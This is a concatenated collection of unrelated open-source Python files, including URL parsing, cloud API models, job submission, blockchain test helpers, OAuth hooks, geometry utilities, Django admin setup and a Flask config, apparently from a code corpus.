delattr(self, field)
@property
def schemes(self):
'''the scheme, split by plus signs'''
return self.scheme.split('+')
@property
def netloc(self):
'''return username:password@hostname:port'''
s = ''
prefix = ''
if self.username:
s += self.username
prefix = '@'
if self.password:
s += ":{}".format(self.password)
prefix = '@'
s += "{}{}".format(prefix, self.hostloc)
return s
@property
def paths(self):
'''the path attribute split by /'''
return filter(None, self.path.split('/'))
@property
def host(self):
'''the hostname, but I like host better'''
return self.hostname
@property
def hostloc(self):
'''return host:port'''
hostloc = self.hostname
if self.port:
hostloc = '{}:{}'.format(hostloc, self.port)
return hostloc
def set_default(self, key, value):
''' Set a default value for key.
This is different than dict's setdefault because it will set default either
if the key doesn't exist, or if the value at the key evaluates to False, so
        an empty string or a None value will be updated.
:param key: the item to update
:type key: str
:param value: the items new value if key has a current value that evaluates to False
'''
if not getattr(self, key, None):
setattr(self, key, value)
def get_url(self):
'''return the dsn back into url form'''
return urlparse.urlunparse((
self.scheme,
self.netloc,
self.path,
self.params,
self.query_str,
self.fragment,
))
def copy(self):
return DSN(self.get_url())
def __str__(self):
return self.get_url()
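# --- Usage sketch (added; not part of the original module) ---
# A minimal demonstration of the parsing above; the dsn string and the
# expected values are made up for illustration.
if __name__ == '__main__':
    example = DSN('postgres+psycopg2://user:secret@localhost:5432/mydb?timeout=10')
    print(example.schemes)   # ['postgres', 'psycopg2']
    print(example.hostloc)   # 'localhost:5432'
    print(example.paths)     # ['mydb']
    print(example.query)     # {'timeout': '10'}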
|
Fusion-Data-Platform/fdp
|
fdp/lib/datasources.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 24 12:49:36 2017
@author: drsmith
"""
import os
from .globals import FdpError
def canonicalMachineName(machine=''):
aliases = {'nstxu': ['nstx', 'nstxu', 'nstx-u'],
'diiid': ['diiid', 'diii-d', 'd3d'],
'cmod': ['cmod', 'c-mod']}
for key, value in aliases.items():
if machine.lower() in value:
return key
# invalid machine name
raise FdpError('"{}" is not a valid machine name\n'.format(machine))
MDS_SERVERS = {
'nstxu': {'hostname': 'skylark.pppl.gov',
'port': '8000'},
'diiid': {'hostname': 'atlas.gat.com',
'port': '8000'}
}
EVENT_SERVERS = {
'nstxu': {'hostname': 'skylark.pppl.gov',
'port': '8000'},
'diiid': {'hostname': 'atlas.gat.com',
'port': '8000'},
'ltx': {'hostname': 'lithos.pppl.gov',
'port': '8000'}
}
LOGBOOK_CREDENTIALS = {
'nstxu': {'server': 'sql2008.pppl.gov',
'instance': None,
'username': None,
'password': None,
'database': None,
'port': '62917',
'table': 'entries',
'loginfile': os.path.join(os.getenv('HOME'),
'nstxlogs.sybase_login')
}
}
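# Example (added): canonicalMachineName('NSTX-U') and
# canonicalMachineName('nstx') both return 'nstxu'; an unrecognized name
# raises FdpError.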
|
sakura-internet/saklient.python
|
saklient/cloud/models/model_licenseinfo.py
|
# -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from ..client import Client
from .model import Model
from ..resources.resource import Resource
from ..resources.licenseinfo import LicenseInfo
from ...util import Util
import saklient
str = six.text_type
# module saklient.cloud.models.model_licenseinfo
class Model_LicenseInfo(Model):
    ## A class providing functionality for searching license type information.
## @private
# @return {str}
def _api_path(self):
return "/product/license"
## @private
# @return {str}
def _root_key(self):
return "LicenseInfo"
## @private
# @return {str}
def _root_key_m(self):
return "LicenseInfo"
## @private
# @return {str}
def _class_name(self):
return "LicenseInfo"
## @private
# @param {any} obj
# @param {bool} wrapped=False
# @return {saklient.cloud.resources.resource.Resource}
def _create_resource_impl(self, obj, wrapped=False):
Util.validate_type(wrapped, "bool")
return LicenseInfo(self._client, obj, wrapped)
    ## Specifies the start offset of the list to fetch next.
    #
    # @param {int} offset Offset
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
def offset(self, offset):
Util.validate_type(offset, "int")
return self._offset(offset)
    ## Specifies the maximum number of records in the list to fetch next.
    #
    # @param {int} count Maximum record count
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
def limit(self, count):
Util.validate_type(count, "int")
return self._limit(count)
    ## Directly specifies the Web API filtering settings.
    #
    # @param {str} key Key
    # @param {any} value Value
    # @param {bool} multiple=False Set to true to pass an array as value and search for exact matches combined with OR. Normally value is a scalar and is fuzzy-matched.
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
def filter_by(self, key, value, multiple=False):
Util.validate_type(key, "str")
Util.validate_type(multiple, "bool")
return self._filter_by(key, value, multiple)
    ## Discards all state configured for the next request.
    #
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo} this
def reset(self):
return self._reset()
    ## Fetches the unique resource that has the specified ID.
    #
    # @param {str} id
    # @return {saklient.cloud.resources.licenseinfo.LicenseInfo} Resource object
def get_by_id(self, id):
Util.validate_type(id, "str")
return self._get_by_id(id)
    ## Executes the resource search request and fetches the results as a list.
    #
    # @return {saklient.cloud.resources.licenseinfo.LicenseInfo[]} Array of resource objects
def find(self):
return self._find()
    ## Narrows the results to resources whose names contain the specified string.
    #
    # Matching is case-insensitive.
    # When multiple strings separated by spaces are given, resources must contain all of them.
    #
    # @todo Implement test case
    # @param {str} name
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
def with_name_like(self, name):
Util.validate_type(name, "str")
return self._with_name_like(name)
    ## Sorts the results by name.
    #
    # @todo Implement test case
    # @param {bool} reverse=False
    # @return {saklient.cloud.models.model_licenseinfo.Model_LicenseInfo}
def sort_by_name(self, reverse=False):
Util.validate_type(reverse, "bool")
return self._sort_by_name(reverse)
## @ignore
# @param {saklient.cloud.client.Client} client
def __init__(self, client):
super(Model_LicenseInfo, self).__init__(client)
Util.validate_type(client, "saklient.cloud.client.Client")
|
jsubpy/jsub
|
jsub/operation/submit.py
|
import os
import logging
from jsub.util import safe_mkdir
from jsub.util import safe_rmdir
class Submit(object):
def __init__(self, manager, task_id, sub_ids=None, dry_run=False, resubmit=False):
self.__manager = manager
self.__task = self.__manager.load_task(task_id)
self.__sub_ids = sub_ids
self.__dry_run = dry_run
self.__resubmit = resubmit
self.__logger = logging.getLogger('JSUB')
        if self.__sub_ids is None:
            self.__sub_ids = range(len(self.__task.data['jobvar']))
self.__initialize_manager()
def __initialize_manager(self):
self.__config_mgr = self.__manager.load_config_manager()
self.__backend_mgr = self.__manager.load_backend_manager()
self.__bootstrap_mgr = self.__manager.load_bootstrap_manager()
self.__navigator_mgr = self.__manager.load_navigator_manager()
self.__context_mgr = self.__manager.load_context_manager()
self.__action_mgr = self.__manager.load_action_manager()
self.__launcher_mgr = self.__manager.load_launcher_manager()
def handle(self):
run_root = self.__backend_mgr.get_run_root(self.__task.data['backend'], self.__task.data['id'])
main_root = os.path.join(run_root, 'main')
safe_rmdir(main_root)
safe_mkdir(main_root)
self.__create_input(main_root)
self.__create_context(main_root)
self.__create_action(main_root)
self.__create_navigator(main_root)
self.__create_bootstrap(main_root)
launcher_param = self.__create_launcher(run_root)
self.__submit(launcher_param)
def __create_input(self, main_root):
content = self.__manager.load_content()
input_dir = os.path.join(main_root,'input')
try:
content.get(self.__task.data['id'], 'input', os.path.join(main_root, 'input'))
        except Exception:
safe_mkdir(input_dir)
def __create_context(self, main_root):
context_dir = os.path.join(main_root, 'context')
safe_mkdir(context_dir)
action_default = {}
for unit, param in self.__task.data['workflow'].items():
action_default[unit] = self.__action_mgr.default_config(param['type'])
navigators = self.__config_mgr.navigator()
context_format = self.__navigator_mgr.context_format(navigators)
self.__context_mgr.create_context_file(self.__task.data, action_default, context_format, context_dir)
def __create_action(self, main_root):
action_dir = os.path.join(main_root, 'action')
safe_mkdir(action_dir)
actions = set()
for unit, param in self.__task.data['workflow'].items():
actions.add(param['type'])
self.__action_mgr.create_actions(actions, action_dir)
def __create_navigator(self, main_root):
navigator_dir = os.path.join(main_root, 'navigator')
safe_mkdir(navigator_dir)
navigators = self.__config_mgr.navigator()
self.__navigator_mgr.create_navigators(navigators, navigator_dir)
def __create_bootstrap(self, main_root):
bootstrap_dir = os.path.join(main_root, 'bootstrap')
safe_mkdir(bootstrap_dir)
bootstrap = self.__config_mgr.bootstrap()
self.__bootstrap_mgr.create_bootstrap(bootstrap, bootstrap_dir)
def __create_launcher(self, run_root):
launcher = self.__task.data['backend']['launcher']
return self.__launcher_mgr.create_launcher(launcher, run_root)
def __submit(self, launcher_param):
if self.__dry_run:
return
        if not self.__resubmit:
if self.__task.data.get('backend_job_ids') or self.__task.data.get('backend_task_id'):
self.__logger.info('This task has already been submitted to backend, rerun the command with "-r" option if you wish to delete current jobs and resubmit the task.')
return
else:
self.__logger.info('Removing submitted jobs on backend before resubmission.')
task_id = self.__task.data.get('backend_task_id')
#remove previously generated files in job folder
job_ids = self.__task.data.get('backend_job_ids')
run_root = self.__backend_mgr.get_run_root(self.__task.data['backend'], self.__task.data['id'])
job_root=os.path.join(run_root,'subjobs')
safe_rmdir(job_root)
if task_id:
self.__backend_mgr.delete_task(self.__task.data['backend'],backend_task_id = task_id)
elif job_ids:
self.__backend_mgr.delete_jobs(self.__task.data['backend'],backend_job_ids = job_ids)
result = self.__backend_mgr.submit(self.__task.data['backend'], self.__task.data['id'], launcher_param, sub_ids = self.__sub_ids)
        if not isinstance(result, dict):
result = {}
if 'backend_job_ids' in result:
njobs = len(result['backend_job_ids'])
else:
njobs = len(result)
if njobs>0:
self.__logger.info('%d jobs successfully submitted to backend.'%(njobs))
self.__task.data.setdefault('backend_job_ids',{})
backend_job_ids=result.get('backend_job_ids',{})
backend_task_id=result.get('backend_task_id',0)
self.__task.data['backend_job_ids'].update(backend_job_ids)
self.__task.data['backend_task_id']=backend_task_id
self.__task.data['status'] = 'Submitted'
task_pool = self.__manager.load_task_pool()
task_pool.save(self.__task)
self.__logger.debug(result)
|
hackaugusto/raiden
|
raiden/tests/utils/smartcontracts.py
|
import os
from typing import List, Tuple
from raiden.network.blockchain_service import BlockChainService
from raiden.network.pathfinding import get_random_service
from raiden.network.proxies.service_registry import ServiceRegistry
from raiden.network.rpc.client import JSONRPCClient
from raiden.network.rpc.smartcontract_proxy import ContractProxy
from raiden.utils import typing
from raiden.utils.smart_contracts import deploy_contract_web3
from raiden.utils.solc import compile_files_cwd
from raiden_contracts.constants import CONTRACT_HUMAN_STANDARD_TOKEN
from raiden_contracts.contract_manager import ContractManager
def deploy_token(
deploy_client: JSONRPCClient,
contract_manager: ContractManager,
initial_amount: typing.TokenAmount,
decimals: int,
token_name: str,
token_symbol: str,
) -> ContractProxy:
token_address = deploy_contract_web3(
contract_name=CONTRACT_HUMAN_STANDARD_TOKEN,
deploy_client=deploy_client,
contract_manager=contract_manager,
constructor_arguments=(initial_amount, decimals, token_name, token_symbol),
)
contract_abi = contract_manager.get_contract_abi(CONTRACT_HUMAN_STANDARD_TOKEN)
return deploy_client.new_contract_proxy(
contract_interface=contract_abi, contract_address=token_address
)
def deploy_tokens_and_fund_accounts(
token_amount: int,
number_of_tokens: int,
deploy_service: BlockChainService,
participants: typing.List[typing.Address],
contract_manager: ContractManager,
) -> typing.List[typing.TokenAddress]:
""" Deploy `number_of_tokens` ERC20 token instances with `token_amount` minted and
distributed among `blockchain_services`. Optionally the instances will be registered with
the raiden registry.
Args:
token_amount (int): number of units that will be created per token
number_of_tokens (int): number of token instances that will be created
deploy_service (BlockChainService): the blockchain connection that will deploy
participants (list(address)): participant addresses that will receive tokens
"""
result = list()
for _ in range(number_of_tokens):
token_address = deploy_contract_web3(
CONTRACT_HUMAN_STANDARD_TOKEN,
deploy_service.client,
contract_manager=contract_manager,
constructor_arguments=(token_amount, 2, "raiden", "Rd"),
)
result.append(token_address)
# only the creator of the token starts with a balance (deploy_service),
# transfer from the creator to the other nodes
for transfer_to in participants:
deploy_service.token(token_address).transfer(
to_address=transfer_to, amount=token_amount // len(participants)
)
return result
def deploy_service_registry_and_set_urls(
private_keys, web3, contract_manager, service_registry_address
) -> Tuple[ServiceRegistry, List[str]]:
urls = ["http://foo", "http://boo", "http://coo"]
c1_client = JSONRPCClient(web3, private_keys[0])
c1_service_proxy = ServiceRegistry(
jsonrpc_client=c1_client,
service_registry_address=service_registry_address,
contract_manager=contract_manager,
)
c2_client = JSONRPCClient(web3, private_keys[1])
c2_service_proxy = ServiceRegistry(
jsonrpc_client=c2_client,
service_registry_address=service_registry_address,
contract_manager=contract_manager,
)
c3_client = JSONRPCClient(web3, private_keys[2])
c3_service_proxy = ServiceRegistry(
jsonrpc_client=c3_client,
service_registry_address=service_registry_address,
contract_manager=contract_manager,
)
# Test that getting a random service for an empty registry returns None
pfs_address = get_random_service(c1_service_proxy, "latest")
assert pfs_address is None
# Test that setting the urls works
c1_service_proxy.set_url(urls[0])
c2_service_proxy.set_url(urls[1])
c3_service_proxy.set_url(urls[2])
return c1_service_proxy, urls
def get_test_contract(name):
contract_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "smart_contracts", name)
)
contracts = compile_files_cwd([contract_path])
return contract_path, contracts
def deploy_rpc_test_contract(deploy_client, name):
contract_path, contracts = get_test_contract(f"{name}.sol")
contract_proxy, _ = deploy_client.deploy_solidity_contract(
name, contracts, libraries=dict(), constructor_parameters=None, contract_path=contract_path
)
return contract_proxy
def get_list_of_block_numbers(item):
""" Creates a list of block numbers of the given list/single event"""
if isinstance(item, list):
return [element["blockNumber"] for element in item]
if isinstance(item, dict):
block_number = item["blockNumber"]
return [block_number]
return list()
|
indico/indico
|
indico/core/oauth/__init__.py
|
# This file is part of Indico.
# Copyright (C) 2002 - 2022 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
import os
from indico.core import signals
from indico.core.db import db
from .logger import logger
from .oauth2 import require_oauth
__all__ = ['require_oauth']
@signals.core.app_created.connect
def _no_ssl_required_on_debug(app, **kwargs):
if app.debug or app.testing:
os.environ['AUTHLIB_INSECURE_TRANSPORT'] = '1'
@signals.users.merged.connect
def _delete_merged_user_tokens(target, source, **kwargs):
target_app_links = {link.application: link for link in target.oauth_app_links}
for source_link in source.oauth_app_links.all():
try:
target_link = target_app_links[source_link.application]
except KeyError:
logger.info('merge: reassigning %r to %r', source_link, target)
source_link.user = target
else:
logger.info('merge: merging %r into %r', source_link, target_link)
target_link.update_scopes(set(source_link.scopes))
target_link.tokens.extend(source_link.tokens)
db.session.delete(source_link)
|
daicang/Leetcode-solutions
|
382-linked-list-random-node.py
|
import random
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
_largesize = 300
def __init__(self, head):
self.head = head
self.lsize = 0
while head.next:
head = head.next
self.lsize += 1
self.m1_idx = None
self.m2_idx = None
if self.lsize > self._largesize:
            self.m1_idx = self.lsize // 3  # start from 1/3
self.m1 = self._getN(self.m1_idx)
self.m2_idx = self.m1_idx * 2 # start from 2/3
self.m2 = self._getN(self.m2_idx)
def _getN(self, n):
n -= 1
p = self.head
while n:
p = p.next
n -= 1
return p
def getRandom(self):
def _get(delta, start):
p = start
while delta:
p = p.next
delta -= 1
return p.val
nextpos = random.randint(0, self.lsize)
if not self.m1_idx:
return _get(nextpos, self.head)
if nextpos < self.m1_idx:
val = _get(nextpos, self.head)
elif nextpos < self.m2_idx:
val = _get(nextpos - self.m1_idx, self.m1)
else:
val = _get(nextpos - self.m2_idx, self.m2)
return val
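# Usage sketch (added; ListNode as in the commented definition above):
#   head = ListNode(1); head.next = ListNode(2); head.next.next = ListNode(3)
#   picker = Solution(head)
#   picker.getRandom()  # returns 1, 2 or 3 with equal probability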
|
tainstr/misura.canon
|
misura/canon/option/tests/test_sqlstore.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import os
from misura.canon import option
from misura.canon.option import get_typed_cols, get_insert_cmd, base_col_def, print_tree
import sqlite3
from misura.canon.tests import testdir
db = testdir + 'storage/tmpdb'
c1 = testdir + 'storage/Conf.csv'
def go(t):
o = option.Option(**{'handle': t, 'type': t})
o.validate()
return o
class SqlStore(unittest.TestCase):
@classmethod
def setUpClass(cls):
if os.path.exists(db):
os.remove(db)
cls.conn = sqlite3.connect(db, detect_types=sqlite3.PARSE_DECLTYPES)
st0 = option.CsvStore(kid='/base/')
st0.merge_file(c1)
st0.validate()
cls.desc = st0.desc
def test_get_typed_cols(self):
print(get_typed_cols(go('Integer')))
print(get_typed_cols(go('String')))
print(get_typed_cols(go('Point')))
print(get_typed_cols(go('Role')))
print(get_typed_cols(go('RoleIO')))
print(get_typed_cols(go('Log')))
print(get_typed_cols(go('Meta')))
def test_get_insert_cmd(self):
print(get_insert_cmd(go('Integer'), base_col_def))
print(get_insert_cmd(go('String'), base_col_def))
print(get_insert_cmd(go('Point'), base_col_def))
print(get_insert_cmd(go('Role'), base_col_def))
print(get_insert_cmd(go('RoleIO'), base_col_def))
print(get_insert_cmd(go('Log'), base_col_def))
print(get_insert_cmd(go('Meta'), base_col_def))
def test_column_definition(self):
s = option.SqlStore()
print(s.column_definition(go('Integer'))[1])
print(s.column_definition(go('String'))[1])
print(s.column_definition(go('Point'))[1])
print(s.column_definition(go('Role'))[1])
print(s.column_definition(go('RoleIO'))[1])
print(s.column_definition(go('Log'))[1])
print(s.column_definition(go('Meta'))[1])
def test_write_desc(self):
s = option.SqlStore()
s.cursor = self.conn.cursor()
s.write_desc(self.desc)
print('READING')
r = s.read_tree()
print(r)
        print('print_tree:\n', print_tree(r))
print('WRITING AGAIN')
s.write_tree(r)
print("READING AGAIN")
r = s.read_tree()
print(r)
        print('print_tree 2:\n', print_tree(r))
# @unittest.skip('')
def test_tables(self):
st0 = option.CsvStore(kid='ciao')
st0.merge_file(c1)
st = option.SqlStore(kid='ciao')
st.desc = st0.desc
k0 = set(st.desc.keys())
cursor = self.conn.cursor()
st.write_table(cursor, 'conf1')
self.conn.commit()
cursor.execute('select handle from conf1')
r = cursor.fetchall()
k1 = set([eval(k[0]) for k in r])
self.assertEqual(k0, k1)
st2 = option.SqlStore(kid='ciao')
st2.read_table(cursor, 'conf1')
self.assertEqual(st.desc, st2.desc)
if __name__ == "__main__":
unittest.main()
|
NiloFreitas/Deep-Reinforcement-Learning
|
reinforcement/players/player_reinforce_rnn_2.py
|
from players.player import player
from auxiliar.aux_plot import *
import random
from collections import deque
import sys
sys.path.append('..')
import tensorblock as tb
import numpy as np
import tensorflow as tf
# PLAYER REINFORCE RNN
class player_reinforce_rnn_2(player):
# __INIT__
def __init__(self):
player.__init__(self)
self.experiences = deque()
# CHOOSE NEXT ACTION
def act(self, state):
return self.calculate(state)
# CALCULATE NETWORK
def calculate(self, state):
size = len( self.experiences )
if size < self.NUM_FRAMES:
return self.create_random_action()
states = np.zeros( (self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
for i , j in enumerate( range( size - self.NUM_FRAMES , size ) ):
states[i] = self.experiences[j][1]
states = np.expand_dims( states, 0 )
output = np.squeeze( self.brain.run('Output', [['Observation', states]]) )
action = np.random.choice( np.arange(len(output)), p=output )
return self.create_action(action)
# PREPARE NETWORK
def operations(self):
# Action Placeholders
self.brain.addInput( shape = [ None , self.num_actions ] , name = 'Actions' )
self.brain.addInput( shape = [ None ] , name = 'Target' )
# Operations
self.brain.addOperation( function = tb.ops.pgcost,
input = [ 'Output', 'Actions', 'Target' ],
name = 'Cost' )
# Optimizer
self.brain.addOperation( function = tb.optims.adam,
input = 'Cost',
learning_rate = self.LEARNING_RATE,
name = 'Optimizer' )
# TensorBoard
self.brain.addSummaryScalar( input = 'Cost' )
self.brain.addSummaryHistogram( input = 'Target' )
self.brain.addWriter( name = 'Writer' , dir = './' )
self.brain.addSummary( name = 'Summary' )
self.brain.initialize()
# TRAIN NETWORK
def train(self, prev_state, curr_state, actn, rewd, done, episode):
# Store New Experience Until Done
self.experiences.append((prev_state, curr_state, actn, rewd, done))
batchsize = len( self.experiences ) - self.NUM_FRAMES + 1
# Check for Train
if done:
# Select Batch
batch = self.experiences
# Separate Batch Data
prev_states = np.zeros( ( batchsize , self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
curr_states = np.zeros( ( batchsize , self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
actions = np.zeros( ( batchsize , self.num_actions ) )
rewards = np.zeros( ( batchsize ) )
dones = np.zeros( ( batchsize ) )
# Select Batches
for i in range( 0 , batchsize ):
for j in range( 0 , self.NUM_FRAMES ):
prev_states[i,j,:,:] = self.experiences[ i + j ][0]
curr_states[i,j,:,:] = self.experiences[ i + j ][1]
actions[i] = self.experiences[ i + self.NUM_FRAMES - 1][2]
rewards[i] = self.experiences[ i + self.NUM_FRAMES - 1][3]
dones[i] = self.experiences[ i + self.NUM_FRAMES - 1][4]
# Calculate Discounted Reward
running_add = 0
discounted_r = np.zeros_like(rewards)
for t in reversed(range(0, len(rewards))):
if rewards[t] != 0: # pygame_catch specific
running_add = 0
running_add = running_add * self.REWARD_DISCOUNT + rewards[t]
discounted_r[t] = running_add
# Optimize Neural Network
_, summary = self.brain.run( ['Optimizer','Summary'], [ ['Observation', prev_states ],
['Actions', actions ],
['Target', discounted_r ] ] )
# TensorBoard
self.brain.write( summary = summary, iter = episode )
# Reset Batch
self.experiences = deque()
|
dmccloskey/SBaaS_rnasequencing
|
SBaaS_rnasequencing/stage01_rnasequencing_analysis_postgresql_models.py
|
from SBaaS_base.postgresql_orm_base import *
import json  # used by __repr__json__ below
class data_stage01_rnasequencing_analysis(Base):
__tablename__ = 'data_stage01_rnasequencing_analysis'
id = Column(Integer, Sequence('data_stage01_rnasequencing_analysis_id_seq'), primary_key=True)
analysis_id = Column(String(500))
experiment_id = Column(String(50))
    sample_name_abbreviation = Column(String(500))
sample_name = Column(String(500)) # equivalent to sample_name_abbreviation
time_point = Column(String(10)) # converted to intermediate in lineage analysis
analysis_type = Column(String(100)); # time-course (i.e., multiple time points), paired (i.e., control compared to multiple replicates), group (i.e., single grouping of samples).
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('experiment_id','sample_name_abbreviation','sample_name','time_point','analysis_type','analysis_id'),
)
def __init__(self,
row_dict_I,
):
self.analysis_id=row_dict_I['analysis_id'];
self.experiment_id=row_dict_I['experiment_id'];
self.sample_name_abbreviation=row_dict_I['sample_name_abbreviation'];
self.sample_name=row_dict_I['sample_name'];
self.time_point=row_dict_I['time_point'];
self.analysis_type=row_dict_I['analysis_type'];
self.used_=row_dict_I['used_'];
self.comment_=row_dict_I['comment_'];
def __set__row__(self,analysis_id_I,
experiment_id_I,
sample_name_abbreviation_I,
sample_name_I,
time_point_I,
analysis_type_I,
used__I,
comment__I):
self.analysis_id=analysis_id_I
self.experiment_id=experiment_id_I
self.sample_name_abbreviation=sample_name_abbreviation_I
self.sample_name=sample_name_I
self.time_point=time_point_I
self.analysis_type=analysis_type_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'analysis_id':self.analysis_id,
'experiment_id':self.experiment_id,
'sample_name_abbreviation':self.sample_name_abbreviation,
'sample_name':self.sample_name,
'time_point':self.time_point,
'analysis_type':self.analysis_type,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
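# Construction sketch (added; all values are placeholders):
#   row = {'analysis_id': 'a1', 'experiment_id': 'e1',
#          'sample_name_abbreviation': 'WT', 'sample_name': 'WT-1',
#          'time_point': '0', 'analysis_type': 'group',
#          'used_': True, 'comment_': ''}
#   rec = data_stage01_rnasequencing_analysis(row)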
|
endarthur/autti
|
auttitude/math.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name
from __future__ import absolute_import
from math import acos, cos, pi, radians, sin, sqrt
import auttitude as at
import numpy as np
def normalized_cross(a, b):
"""
Returns the normalized cross product between vectors.
Uses numpy.cross().
Parameters:
a: First vector.
b: Second vector.
"""
c = np.cross(a, b)
length = sqrt(c.dot(c))
return c/length if length > 0 else c
def general_plane_intersection(n_a, da, n_b, db):
"""
Returns a point and direction vector for the line of intersection
of two planes in space, or None if planes are parallel.
Parameters:
        n_a: Normal vector to plane A
        da: Plane A constant term (n_a . x = da)
        n_b: Normal vector to plane B
        db: Plane B constant term (n_b . x = db)
"""
# https://en.wikipedia.org/wiki/Intersection_curve
n_a = np.array(n_a)
n_b = np.array(n_b)
da = np.array(da)
db = np.array(db)
l_v = np.cross(n_a, n_b)
norm_l = sqrt(np.dot(l_v, l_v))
if norm_l == 0:
return None
else:
l_v /= norm_l
aa = np.dot(n_a, n_a)
bb = np.dot(n_b, n_b)
ab = np.dot(n_a, n_b)
d_ = 1./(aa*bb - ab*ab)
l_0 = (da*bb - db*ab)*d_*n_a + (db*aa - da*ab)*d_*n_b
return l_v, l_0
def small_circle_intersection(axis_a, angle_a, axis_b, angle_b):
"""
    Finds the intersection between two small circles, returning zero, one or
    two solutions as a tuple.
Parameters:
axis_a: Vector defining first circle axis
angle_a: Small circle aperture angle (in radians) around axis_a
axis_b: Vector defining second circle axis
angle_b: Small circle aperture angle (in radians) around axis_b
"""
line = general_plane_intersection(axis_a, cos(angle_a),
axis_b, cos(angle_b))
if line is None:
return ()
l_v, l_0 = line
# https://en.wikipedia.org/wiki/Line%E2%80%93sphere_intersection
b = 2*l_v.dot(l_0)
delta = b*b - 4*(l_0.dot(l_0) - 1)
# Should the answers be normalized?
if delta < 0:
return ()
elif delta == 0:
return -b/2.,
else:
sqrt_delta = sqrt(delta)
return l_0 + l_v*(-b - sqrt_delta)/2., l_0 + l_v*(-b + sqrt_delta)/2.
def build_rotation_matrix(azim, plng, rake):
"""
    Returns the rotation matrix that rotates the North vector to the line given
    by Azimuth and Plunge; the East and Up vectors are rotated clockwise by Rake
    around the rotated North vector.
Parameters:
azim: Line Azimuth from North (degrees).
plng: Line Plunge measured from horizontal (degrees).
rake: Rotation angle around rotated axis (degrees).
"""
# pylint: disable=bad-whitespace
azim, plng, rake = radians(azim), radians(plng), radians(rake)
R1 = np.array((( cos(rake), 0., sin(rake)),
( 0., 1., 0. ),
(-sin(rake), 0., cos(rake))))
R2 = np.array((( 1., 0., 0. ),
( 0., cos(plng), sin(plng)),
( 0., -sin(plng), cos(plng))))
R3 = np.array((( cos(azim), sin(azim), 0. ),
(-sin(azim), cos(azim), 0. ),
( 0., 0., 1. )))
return R3.dot(R2).dot(R1)
def adjust_lines_to_planes(lines, planes):
"""
    Project each given line to its respective plane. Returns the projected
lines as a new LineSet and the angle (in radians) between each line and
plane prior to projection.
Parameters:
lines: A LineSet like object with an array of n Lines
        planes: A PlaneSet like object with an array of n Planes
"""
lines = at.LineSet(lines)
planes = at.PlaneSet(planes)
angles = np.zeros(len(lines))
adjusted_lines = np.zeros_like(lines)
for i, (line, plane) in enumerate(zip(lines, planes)):
cos_theta = np.dot(line, plane)
angles[i] = pi/2. - acos(cos_theta)
adjusted_line = line - line*cos_theta
adjusted_lines[i] = adjusted_line/sqrt(np.dot(adjusted_line,
adjusted_line))
return adjusted_lines, angles
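# Quick sanity check (added): with azim = plng = rake = 0 every factor in
# build_rotation_matrix() is the identity matrix, so
#   np.allclose(build_rotation_matrix(0, 0, 0), np.eye(3))  # -> True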
|
ADKosm/Recipes
|
Recipes/rcps/admin.py
|
from django.contrib import admin
# Register your models here.
from rcps.models import *
class IngredientToRecipeInline(admin.TabularInline):
model = Ingredient.recipes.through
verbose_name = 'Ингредиент'
verbose_name_plural = 'Ингредиенты'
class EquipmentInline(admin.TabularInline):
model = Equipment.equipment_recipes.through
verbose_name = 'Инструмент'
verbose_name_plural = 'Инструменты'
class TagInline(admin.TabularInline):
model = Tag.tag_recipes.through
verbose_name = 'Тег'
verbose_name_plural = 'Теги'
class RecipeAdmin(admin.ModelAdmin):
model = Recipe
fields = ['recipe_name', 'recipe_link']
inlines = (
IngredientToRecipeInline,
EquipmentInline,
TagInline,
)
class IngredientComponentInAlternativeInline(admin.TabularInline):
model = IngredientAlternative.ingredients.through
verbose_name = 'Ингредиент'
verbose_name_plural = 'Ингредиенты'
class IngredientAlternativeAdmin(admin.ModelAdmin):
model = IngredientAlternative
inlines = (
IngredientComponentInAlternativeInline,
)
admin.site.register(Recipe, RecipeAdmin)
admin.site.register(Ingredient)
admin.site.register(IngredientAlternative, IngredientAlternativeAdmin)
admin.site.register(IngredientCategory)
admin.site.register(Equipment)
admin.site.register(EquipmentCategory)
admin.site.register(IngredientReplacement)
admin.site.register(Tag)
|
jiangtyd/crewviewer
|
project/config.py
|
import os
class Config(object):
DEBUG = False
TESTING = False
CSRF_ENABLED = True
SECRET_KEY = "super_secret_key"
SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
class ProductionConfig(Config):
DEBUG = False
SECRET_KEY = os.environ['SECRET_KEY']
class DevelopmentConfig(Config):
DEVELOPMENT = True
DEBUG = True
class TestingConfig(Config):
TESTING = True
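# Usage sketch (added; assumes a Flask app, which these settings imply):
#   app.config.from_object('project.config.DevelopmentConfig')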
|
geographika/mappyfile
|
docs/scripts/class_diagrams.py
|
r"""
Create MapServer class diagrams
Requires https://graphviz.gitlab.io/_pages/Download/Download_windows.html
https://stackoverflow.com/questions/1494492/graphviz-how-to-go-from-dot-to-a-graph
For the DOT language see http://www.graphviz.org/doc/info/attrs.html
cd C:\Program Files (x86)\Graphviz2.38\bin
dot -Tpng D:\GitHub\mappyfile\mapfile_classes.dot -o outfile.png
outfile.png
For Entity Relationship diagrams:
https://graphviz.readthedocs.io/en/stable/examples.html#er-py
"""
import os
import pydot
# import pprint
FONT = "Lucida Sans"
def graphviz_setup(gviz_path):
os.environ['PATH'] = gviz_path + ";" + os.environ['PATH']
def add_child(graph, child_id, child_label, parent_id, colour):
"""
